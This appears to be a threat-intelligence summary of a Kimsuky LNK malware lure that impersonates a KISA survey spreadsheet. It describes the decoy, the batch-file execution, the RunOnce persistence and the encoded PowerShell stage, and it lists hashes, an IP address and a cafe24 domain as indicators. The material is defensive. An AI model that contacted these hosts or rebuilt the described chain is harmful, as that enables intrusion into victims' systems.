김수키(Kimsuky) 한국 인터넷 진흥원(KISA) 사칭 악성코드-현황조사표.xlsx.lnk(2023.8.11)
2023-08-22 • Sakai • Kimsuky Malware impersonating Korea Internet & Security Agency (KISA) - Status Survey.xlsx.lnk (2023.8.11) •
The source analyzes a Kimsuky LNK malware sample disguised as a Korea Internet & Security Agency status-survey spreadsheet, using a hidden PowerShell command chain rather than a real Excel document. The LNK extracts a decoy 현황조사표.xlsx and a batch file from embedded byte ranges, launches the decoy, and executes PMmVvG56FLC9y.bat through SysWOW64 cmd.exe. The batch file copies itself to the user profile, adds RunOnce persistence, decodes a hex-encoded PowerShell payload, and contacts attacker infrastructure including 75.119.136.207 and bian0151.cafe24.com. The report includes hashes for the LNK and BAT payload, supporting detection of Kimsuky document-lure execution and persistence tradecraft.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 0eb8db3cbde470407f942fd63afe42b8 | 2023-08-22 | 2023-09-06 |
| HASH | 2d444b6f72c8327d1d155faa2cca7fd7 | 2023-08-22 | 2023-09-06 |
| URL | http://bian0151.cafe24.com/admi… | 2023-08-22 | 2023-09-06 |
| DOMAIN | bian0151.cafe24.com | 2023-08-22 | 2023-09-06 |
| IPv4 | 75.119.136.207 | 2023-07-11 | 2023-09-06 |
| HASH | 66165dfb784cbcb442e4767f0ca4f469 | 2023-08-22 | 2023-08-30 |
| HASH | b93c13204acb4819c7688f847b1470a… | 2023-08-22 | 2023-08-22 |
| HASH | a39831ecbe0792adf87f63fb9955735… | 2023-08-22 | 2023-08-22 |
| HASH | d9144b0da0d1ea7671667ffcd854484… | 2023-08-22 | 2023-08-22 |
| HASH | ebd20c8c63690965267c97348f4db89… | 2023-08-22 | 2023-08-22 |